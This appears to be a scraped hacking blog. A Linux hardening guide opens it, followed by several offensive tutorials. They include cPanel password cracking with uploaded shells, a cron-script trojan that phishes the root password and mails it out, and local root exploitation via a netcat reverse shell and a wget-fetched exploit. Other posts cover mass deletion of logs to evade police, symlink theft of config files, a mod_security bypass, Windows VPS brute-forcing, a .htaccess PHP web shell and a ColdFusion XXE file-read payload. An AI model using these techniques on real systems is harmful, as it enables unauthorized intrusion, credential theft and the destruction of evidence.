How to Secure a Linux Server

The free, open-source GNU/Linux operating system is getting better each year for desktop use, but it's been a major contender for server use since the late 1990s. With popularity, however, it has become profitable for thieves to break into Linux servers and use them for spamming, scams, and serving pornography, among other things. Here are some ways you can protect your server from such a fate.

Steps

1. Learn to use Linux from the shell (command line). Every layer of software added on to make your system administration "easier" actually adds more methods for crackers to gain access to your machine and also reduces performance. All the further steps will assume your familiarity with using a shell.
   

Using lsof or a similar tool, find out on which ports your computer is listening for connections:

ns003:~# lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
named 17829 root 4u IPv6 12689530 UDP *:34327
named 17829 root 6u IPv4 12689531 UDP *:34329
named 17829 root 20u IPv4 12689526 UDP ns003.unternet.net:domain
named 17829 root 21u IPv4 12689527 TCP ns003.unternet.net:domain (LISTEN)
named 17829 root 22u IPv4 12689528 UDP 209.40.205.146:domain
named 17829 root 23u IPv4 12689529 TCP 209.40.205.146:domain (LISTEN)
lighttpd 17841 www-data 4u IPv4 12689564 TCP *:www (LISTEN)
sshd 17860 root 3u IPv6 12689580 TCP *:ssh (LISTEN)
sshd 17880 root 3u IPv6 12689629 TCP *:8899 (LISTEN)
sshd 30435 root 4u IPv6 74368139 TCP 209.40.205.146:8899->dsl-189-130-12-20.prod-infinitum.com.mx:3262 (ESTABLISHED)

If in doubt, hack it out! Shut down any unknown or unneeded services, using the appropriate tools for your Linux distribution, such as update-rc.d on Debian systems, or in some cases editing the /etc/inetd.conf or/etc/xinetd.d/* files. Along with this, get rid of any tools your server provider added for system administration, such as Plesk.

Don't allow root logins on your primary sshd port 22 (set PermitRootLogin to "no"); many automated tools run brute-force attacks on that. Set up a secondary port for root access that only works by shared keys, disallowing passwords:

• Copy the sshd_config file to root_sshd_config, and change the following items in the new file:
  • Port from 22 to some other number, say 8899 (don't use this! make up your own!)
  • PermitRootLogin from "no" (you were supposed to set it to "no" for port 22, remember?) to "yes"
  • AllowUsers root add this line, or if it exists, change it to allow only root logins on this port
  • ChallengeResponseAuthentication no uncomment this line if it's commented out, and make sure it says "no" instead of "yes"
• Test this command: 
  
  sshd -D -f /etc/ssh/root_sshd_configand see if it works correctly -- try logging in from another computer (you must have already set up shared-key authentication between the two computers) using: 
  
  ssh -p8899 root@my.remote.serverand if so, control-C at the above (sshd) command to stop the sshd daemon, then add this to the end of /etc/inittab: 
  
  rssh:2345:respawn:sshd -D -f /etc/ssh/root_sshd_config
• Restart the init task: # init q This will run your "root ssh daemon" as a background task, automatically restarting it in case of failure.

Video

Tips

• Check your log files regularly to see what types of attacks are being run against your server./var/log/auth or /var/log/auth.log is a typical place to find attempted logins: 
  Jan 18 10:48:46 ns003 sshd[23829]: Illegal user rosa from ::ffff:58.29.238.252
  Jan 18 10:48:49 ns003 sshd[23833]: Illegal user rosemarie from ::ffff:58.29.238.252
  Jan 18 10:48:51 ns003 sshd[23838]: Illegal user ruth from ::ffff:58.29.238.252
  Jan 18 10:48:54 ns003 sshd[23840]: Illegal user sabine from ::ffff:58.29.238.252
  Jan 18 10:48:57 ns003 sshd[23845]: Illegal user sandra from ::ffff:58.29.238.252
• Regularly upgrade your operating system to add security fixes. On Debian: apt-get upgrade
• Monitor news on vulnerabilities at http://www.securityfocus.com/ and related websites.
• Try installing grsecurity and/or SELinux and/or AppArmour and/or PaX.

Read more ...

Cpanel Cracking

Things Required :-

• Shelled site ( Download Best Shellz Here)
• Cpanel Password Cracker (Download  Password : www.rotinextools.blogspot.com)

Step By Step Tutorial :-

• First open you shell & upload the cpanel password cracker shell 
• Then go down & click on User .

• Now after you have clicked on User, below you will get all the usernames of the Cpanel . So now move to next step, your next step will be to get a good Password list for a Dictionary attack . After getting it you have to copy the username & paste it in the username block (above) & paste the password list in the password block .Then finally click on start .

Tip: Password list should be short & effective . 

• When the cracking is finished, you will see the result . 

• After Getting the login info you can login by going to -> www.site.com:2082 or www.site.com/cpanel

Read more ...

Root server without local root exploit

Many hackers find it difficult to find a local root exploit for rooting the server. So here is few methods you could try to gain root acess without using a local root exploit!

1. Custom Cron Tab Scripts

Cron Jobs are some Tasks that are set to be Executed at a specific time. If the Root user has created a Custom Script used by Cron, and we can Write on this File, we can send a “Fake” Error Message and the Root user will probably type in his password.

First, check out if there are any Cron Job Tasks:

 crontab -l 

If you see any Custom Script, we must Check out if we can Write on it.

Let’s say we got a Custom script here: /bin/cronscript

To check if we can Write a File, type:

 stat /bin/cronscript 


 (If you get something like: “-rwxrwxrwx” in the output, you can edit the File!) 

Let’s edit the file and send a Fake Error Message.

Make a Copy of the Original Script to /bin/cronscript.bak :

 cp /bin/cronscript /bin/cronscript.bak 

Edit the /bin/cronscript like this:

 #!/bin/sh 


 echo “An System Error Occured!” 


 echo “” 


 echo “Error Code: #131425″ 


 echo “” 


 echo “Update to get the Latest Patch for this Security Issue.” 


 read -s -p “[sudo] password for root ” rootpasswd 


 echo “” 


 echo “su: Authentication failure” 


 echo “” 


 sudo apt-get update && sudo apt-get upgrade 


 sudo echo “The Password is: $rootpasswd” > .kod 


 mail -s “Root’s Password” “  email@address.com  ” < .kod 


 rm .kod 


 mv  cronscript.bak cronscript 

You should just Replace the Underlined with your E-Mail and the Name of the Script!

After you save the File, type: chmod +x cronscript   to set it as Executable!

This script will:

- Send a Fake Error Message

- Request for the Root’s Password

- Send to your E-Mail Address the Password (make sure that there is the “ mail ” command at the /bin )

- Restore the Original File

When the Script gets Executed, the Root User will Enter his Password and it will be send to you!

It would be better if you had some knowledge on Bash Programming…

2. Enumerating all SUID Files

An SUID File is any file that any User group has the Priviliges to Access, Read and Write on it.
What does this mean for you:   You can Escalate Priviliges in this way, if it is in an Important Directory.
you can Social-Engineer a Privileged User.

To find all SUID Files, type:

 find / -user root -perm -4000 -print 

This will show all the SUID Files to your Terminal. Take your time and check them as they can help you to escalate Priviliges!

3. Brute Forcing

I know what you are thinking after seeing the title, well this is different the tool we gonna use is called Rootdabitch

What is so special in this?

The magic about this tool is that It works in background, so you can leave it working for days until you have results... when the password is cracked it will be mailed to you :)

For this, you need to have phpshell/ reverse shell / ssh access to the target to run this tool, You can get the tool here Rootdabitch v0.1

Usage:

./rootdabitch.sh youremail@site.com

For kiddies:

First download rootdabitch to the server:

wget http://rootdabitch.googlecode.com/files/rootdabitch-0.1.zip

Extract it by the following cmd:

unzip rootdabitch-0.1.zip

Chmod it to 755:

chmod + x rootdabitch.sh

Finally run the script

./rootdabitch.sh youremail@site.com

Simply just chmod it and run the script. If the password is cracked you will have a mail containing the root password which will be in the file "passwords.txt" attached to the mail

Thats all have a gr8 day :)

Read more ...

LINUX SERVER ROOTING Tutorial

Root is the Administrator of all server. If someone got root access he can do anything with server like delete and copy anything on server ; can deface all the home pages (massive
deface )

Although there are mainly 3 wayz in which you can get into the server but here we will take the first method that is by local root

NEEDS :

• Netcat (Download from Here)
• Shelled site (Best Shellz Here)
• Local root exploit (which you can find it Here  Or Download This collection Here)

STEPS:

• In RUN program type cmd then type this  cd C:\Program Files\Netcat  but first save your netcat in the directory 

After it type this  : nc -n -l -v -p 443 , and you will get this -

Now open the url in which you had upload your shell and then connect it using back connect option in the shell(Be careful some shell do not have this option and do not use any proxy,tor or VPN), when connection is established you will get something like this -

Now you  have successfully connected ..  then we have to get the local root exploit like now we have   2.6.18-374 2011 . 

• Now we have to first  upload our exploit in a writable folder, simply we can just change the directory to the /tmp folder which is a standard writable folder . 

 command to change dir to /tmp : cd /tmp

• To upload your your exploit we will use the  wget function . 

Now Type : wget http://www.example.com/exploit.c 

Now exploit will be uploaded to tmp folder

 

•  (CASE TYPE 1) if you have uploaded your exploit as  (exploit.c) the we have to compile it, so to compile it we will type the following command .

Type : gcc exploit.c -o exploit

Note that  above command exploit refers to the name of your exploit (exploit.c) .so if its properly compiled with no errors & warning then you can proceed or if you get an error then find another exploit. 

(CASE TYPE 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the below command .

Type: unzip exploit.zip 

• After we have done all the above steps correctly, its time to give permission so we will type the following  command 

Type: chmod 777 exploit

• Now  its time to run the Exploit, to run the exploit we will type the following command 

Type: ./exploit

Now the exploit will run & the server will be rooted  ;) .  To check weather we got root we can type 

Type: id or whoami  

NOW HOW TO CLEAR THE LOG AND COME OUT SAFELY FROM SERVER

If you do not want to caught yourself by Cops then delete the log using following commands

rm -rf /tmp/logs

rm -rf $HISTFILE

rm -rf /root/.ksh_history

rm -rf /root/.bash_history

rm -rf /root/.ksh_history

rm -rf /root/.bash_logout

rm -rf /usr/local/apache/logs

rm -rf /usr/local/apache/log

rm -rf /var/apache/logs

rm -rf /var/apache/log

rm -rf /var/run/utmp

rm -rf /var/logs

rm -rf /var/log

rm -rf /var/adm

rm -rf /etc/wtmp

rm -rf /etc/utmp

history -c

find / -name *.bash_history -exec rm -rf {} \;

find / -name *.bash_logout -exec rm -rf {} \;

find / -name "log*" -exec rm -rf {} \;

find / -name *.log -exec rm -rf {} \;

i hope you had learn how to root a server My next Tutorial will be about How to mass deface after rooting a server.

- See more at: http://www.hax0rtools.com/2013/09/linux-server-rooting-tutorial.html#sthash.qnEYBeti.dpuf

Read more ...

Symlink Tutorial for beginners

What do you mean by Symbolic links?

In computing, a symbolic link (also symlink or soft link) is a special type of file that contains a reference to another file or directory in the form of an absolute or relative path and that affects pathname resolution.

How to Do Symlink on Web-server ? 

In Symlink you need to shell access like GNY,C99,r57 etc.. on website.. It's look like this


Now You need To create 1 directory with any Name like sym,test etc....

Now after Creating Directory You need 2 file
1. Blank .txt file in zip format.
2. .htaccess

The txt file include this "/" and save it..
and .htaccess file include this below code:

Options Indexes FollowSymLinks
DirectoryIndex test.htm 
AddType txt .phpAddHandler txt .php

and save it like ".htaccess"

now you need to upload both file zip and .htaccess. After Uploading both file We need to "unzip"
file using this command:

"unzip "file name" "

after unzip u show a txt file there. Now you need to open appropriate path in Web browser.

It's look like this.

Now Just Click on 1.txt file that you unzip a zip file. After Click on 1.txt file It include all Directory's of the Web-server check out below Image:

Ok done Now in Symlink we will check the Directory path like

1. /home/"Website Username"/Public_html/
2. /hsphere/local/home/c283273/

There are Different Path Just you need to check out it.

If you Click On "Home" You will get 403 Error Means Forbidden Error but never mid after you get this Error you need to add "Website Username"

To find WebUsers You need to execute This command

cat /etc/passwd

the path is "/Home/"website username"/public_html/"

After execute cat command it's look like above image.

Now Just find specific Target that have ADMIN LOGIN PAGE and CONFIG FILE

How did you find this specific Target site?

you need Server Ip and www.bing.com


To find Joomla,Wordpress and php site we can use this dork for it.
1. ip: 123.x.x.x index.php?option=2. ip: 123.x.x.x "Powered By WordPress"
3. ip: 123.x.x.x .php?id=
and more......

Finding Target site now you need to find config file. in joomla the config file name is "configuration.php" in wordpress "wp-config.php" etc.

You cannot directly see the file using like this

www.Target.com/wp-config.php
www.Target.com/configuration.php

But when we do symlink on specific Target we can show config file using Right click and view source..

It's look like above Image

This config file include site Database information like Database Name, Username, Password etc..

after getting this You can login into site data base and you can edit,delete of specific columns, fields etc..

But we need to change admin password. In many case The password is in MD5, base64 etc.. encrypted form. You need to Decrypt it... that's it.

after changing the password You know what to do...!!! 

Read more ...

Bypass 403 Forbidden And Cant Read /Etc/Named.Config Error

Now days most of the Linux Kernel server show this error when you try to symlink the server . Most of the server which shows 403 forbidden has cant read named.config error when you try to symlink using scripts like Symlink_Sa or Madspot Security Team Shell or what ever script used for Automated Symlink .

This can be bypassed by Reading /ect/passwd and Symlink_Sa 3.0 can be used to bypass this . 

I will be posting the download link of some shells i will be using in this tutorial 

Best Script which can bypass cant read /ect/named.conf are :

1. Config Fucker By Web Root Hack Tools. ( Mass Symlink Config files )
2. Config Killer By Team Indishell . ( Mass Symlink Config file php based script )
3. Symlink Pain [~] allsoft.pl ( Perl Script to Mass Symlink Config files )
4. Symlink_Sa 3.0 Automated Symlink Script .

Usage : Config Fucker , Con fig Killer and Symlink Pain [~] Perl script just upload them on to the server make sure that you create a new directory . Upload the scirpt and use the command cat /ect/passwd to read all /ect/passwd from the server and copy them and just open your script and paste it there and click on Get Config and Your Done . Just open the link of the folder you created eg . site.com/sen/allsoft.pl you need to open site.com/sen/ and all config files will be there 

Note : Its better to create a php.ini file before you do this for 100 % Result 

All 4 shells i have mentioned i will post the download link 

And i will be using a another private shell for this which i wont be giving you all for Priv8 Issue its Mannu Shell Coded by Team Indishell Which can bypass cant read /ect/named.conf error easily . But 403 Forbidden Server cant be bypassed using this shell . 

So now if we cant symlink to the Public_html/ of the website we can use Symlink_sa 3.0 script Symlink Bypass Option -

So now that we can easily Symlink to /Public_html/ path of each website 

Now some server show 403 forbidden Error when you try to Symlink them so now lets see how to by pass this shit 



For 403 Forbidden Error i will be Using the Following Shells :

1. Dhanush Shell Coded By Arjun . ( This shell automitically creates .htaccess , php.ini and ini.php files after you login )
2. Mannu Shell by Team Indishell Private ! .
3. Symlink_sa 3.0 Script

I will be posting the download link of Dhanush shell and Symlink _sa 3.0 ( Mannu shell is private as i already told )

So what is the trick that makes us bypass 403 Forbidden , Its just the .htaccess and php.ini which contains the following code :

.htaccess

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

php.ini

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>

1.) 403 Forbidden Error :

2.) Open Dhanush Shell which automatically creates .htaccess , php.ini and ini.php .

3.) Mannu shell to Check if we Bypassed 403 Error : 

4.) Bypassed 403 Forbidden and Access to Public_html/ Path 

Bypassed can't read /ect/named.conf and 403 forbidden Error 

Here Download Link of all shell and script i used :  CLICK HERE 

Read more ...

How to hack a websites using Symlink Bypassing?

Symlink Bypassing:

Symlink is a method to reference other files and folder on Linux, in order to make linux work faster.  Symlink Bypassing is a hacking technique used to gain unauthorized access to folders on a server. Using this technique an hackers are able to hack multiple sites on a shared web hosting service.

Here is Video tutorial that explain how to hack a website using Symlink Bypassing, 

Video demo is created by SilentHacker 

Read more ...

How To Hack Windows Servers Using Dubrute 2.2

Today im sharing u How to Hack Many many Windows VPS.

All u need 2 Softwares called DuBrute and Vnc_scanner to hack VPS.
Download Links :
Vnc_scanner : Here
Dubrute : Here

Words list
How to Use ?

1) Download both the files from the above link.
2) Extract both the files anywhere in ur pc.
3) Open Vnc_scanner folder
4) Open the exe file called vnc_scanner_gui.exe



5) Select any Country.
6) Click on Get Dial List
After the all ip list Came then :
7) Click on Start Scan



After that it will scan for VPS working ips.



After Scan finished click on Start parser.It will save good ips in new text file called IPs.txt.

Now u need to get the usernames and Passwords for Scanned ips.For that u have to use one of the hacking software called Dubrute.

1) Open Dubrute folder
2) Copy the IPs.txt file from vnc_scanner folder and paste in Dubrute folder
3) Open the DUBrute.exe



4) Click on Generation
5) Check the image below.



1st click on File ip then select the text file called IPs.txt and Open
2nd Select File Login then Open and then File Pass and Open.
3rd ,Click on Make and Press Ok.
Then Click on Exit

Now press Start in ur Dubrute.

Let it brute the combinations.When a working VPS which match IP , Username and Pass , it would be saved in Dubrute folder File called goog.txt
Like dis : 
In this Image shows that I found 3 VPS which is working.

Note : Both the files has Virus.Ur anti-virus detect as Trojan etc.So when u download ,if ur anti-virus active then it will delete ur files.If u want to use then u have to turn off ur anti virus.Or u can hack vps with a VPS like me.I downloaded THese files on a VPS and hacked it ;P.These soft i used to hack VPS from last 1-2 weeks.I hacked around 100 working VPS.

This is a Detailed Tutorial about How to hack VPS ?.Should u have more doubt on this , feel free to reply here.am here to help u.

Thanks and Good Luck to all for hack many many VPS.

How to use VPS

Go to Start > Run > Type mstsc and press OK
Then put ur VPS ip and Connect.Then Type ur ID and pass then OK
Thats it.U are into the Virtual Private Server

How to Change Pass of VPS?
Press Ctrl + Alt + End u will see the option for Change pass.
Note : U could change pass if only u have the permission from the Administrator.
Respect !

Read more ...

ATTACKING WEBSERVERS VIA .HTACCESS

A while back I was testing a CMS that had a curious feature, all uploaded files were placed in their own directory. This was not a security enhancement as the application allowed php files to be uploaded. However I coudn't help ask, what if php uploads had been restricted? The answer was .htaccess files. Using SetHandler in a .htaccess file is well known, but does not lead to remote code execution. So after some thinking I put together some self contained .htaccess web shells. I wrote both a php and a server side include shells, but other options can easily be added (jsp, mod_perl, etc).


This works by first diverting the default apache .htaccess access restriction from within the .htaccess file so we can access it as a url. Next we reconfigure the .htaccess extension to be treated as a dynamic content script and finally we have our payload. The attack works because the .htaccess parsing and processing for apache configuration directives occur before the .htaccess file is processed as a web request. There is a relatively small gotcha, the payload has to be commented out with a # at the start so it doesn't get interpreted by apache and likewise, the script interpreter must ignore the apache directives. PHP lends itself well to this as any content not within the <?php ?> tags are presented as is.

01 # Self contained .htaccess web shell - Part of the htshell project

02 # Written by Wireghoul - http://www.justanotherhacker.com

03

04 # Override default deny rule to make .htaccess file accessible over web

05 <Files ~ "^\.ht">

06 Order allow,deny

07 Allow from all

08 </Files>

09

10 # Make .htaccess file be interpreted as php file. This occur after apache has interpreted

11 # the apache directoves from the .htaccess file

12 AddType application/x-httpd-php .htaccess

13

14 ###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######



Simply upload the preferred shell as a .htaccess file and then visit the .htaccess file via the url http://domain/path/.htaccess?c=command for remote code execution. The collection of attack files are collectively accessible from my github htshells repository 

Read more ...

Hacking Cold Fusion Servers - Part II

Now I will go over two more additional vulnerabilities which can be potentially leveraged to attack Cold Fusion Servers. This time we will be looking at exploiting a weak uploader as well as another LFD/LFI vulnerability but with small twist. If you didn't catch the first part then I encourage you to read that thread before reading this one as it makes for better attack flow in general this way. Assuming your all set, let's begin....

Now one thing to be aware of is that Cold Fusion packed an FCKEditor in with v8 when it was first released and they didn't due proper checking on the upload types. If you give it a file as .txt but write to .cfm or .jsp it thinks this is ok! This exploit will take some coding abilities on your behalf or the ability to use Metasploit as it has a nice pre-built exploit for this one (Java Meterpreter works best for payload). You basically shoot and point with MSF and hope for the best. If the uploader is present it will try to send a multi-part upload request via POST. If successful you should be able to find a shell in '/userfiles/file/' directory of the site. Now I have coded my own script for this and tried with Metasploit but have not successfully exploited this myself so not going to post my code just yet, would like to confirm it first. You have MSF as a crutch for now, can find the module by referencing CVE-2009-2265, or just type 'use exploit/windows/http/coldfusion_fckeditor'; I will update this section when I have confirmation of working code on my part.....




OK, so in addition to the previously shown LFD/LFI to RCE vulneranility we demonstrated in part I of this series, there is another LFD/LFI vulnerability. This time it is XML External Entities (XEE) Injection in the Data Services which allows a wide range of XML based attacks, including Local File Disclosure, TCP scans and Denial of Service condition, which can be achieved by recursive entity injection, attribute blow up and other types of injection. For more information about the implications associated to this vulnerability, refer to the RFC2518 (17.7 Implications of XML External Entities): http://www.ietf.org/rfc/rfc2518.txt. I will show you how we can exploit this to map out the target server and read files. Basically we send a carefully crafted XML request to the Data Service file handler and if it is vulnerable to XEE Injection it will spit back the results we ask for. Here are some common files to check:

/flex2gateway/
/flex2gateway/http
/flex2gateway/httpsecure
/flex2gateway/cfamfpolling
/flex2gateway/amf
/flex2gateway/amfpolling
/messagebroker/http
/messagebroker/httpsecure
/blazeds/messagebroker/http
/blazeds/messagebroker/httpsecure
/samples/messagebroker/http
/samples/messagebroker/httpsecure
/lcds/messagebroker/http
/lcds/messagebroker/httpsecure
/lcds-samples/messagebroker/http
/lcds-samples/messagebroker/httpsecure

You can accomplish this with Hackbar add-on in Firefox easily enough, Burp or Netcat is just as easy. Essentially we can use the below XML Code as a framework for our file injection and enumeration, simply pass it as POST data to the vulnerable Data Service:

"<?xml version="1.0" encoding="utf-8"?><!DOCTYPE test [ <!ENTITY x3SYSTEM "<INSERT_PATH/FILE_HERE>"> ]><amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx"><body><object type="flex.messaging.messages.CommandMessage"><traits><string>body</string><string>clientId</string><string>correlationId</string><string>destination</string><string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string><string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object><traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string><int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>"

Simply replace '<INSERT_PATH/FILE_HERE>' with the path to read an let the requests rip, like so:





Now the cool thing here is that it works regardless of OS, since it is due to how the Data Services are handling and parsing the XML data being passed, just make sure you request the proper file type for designated system type (check server response if you have no idea)...





Also in addition to reading files, you can simply pass a directory and it will spit back the directory content, making it very easy to map things out and find files worth reading. Now limited privileges may restrict some file reading but still plenty enough to cause trouble, enumerate lots of info, and possibly even read the site configuration details...




In addition to these named exploits in this Cold Fusion series, the same old usual suspects are still fair game here. SQL injection vulnerabilities just as common as on PHP or ASP based sites, and 'cfincludes' can enable source disclosures. In many cases the db can be compromised and Java commands maybe leveraged to further extend the potential attack vectors and escalation platform from that of a standard injection so keep your eyes out and don’t be afraid to take on a new site just cause it has .CFM or .JSP files instead of the oh so popular .PHP or .ASP. Hope you enjoyed this short series on hacking Cold Fusion Servers. All material for the series was available on the net in various places, all I did was wrap it up for you and try to make it a little easier to understand. If you have any questions or suggestions please post em here or let me know via PM

Read more ...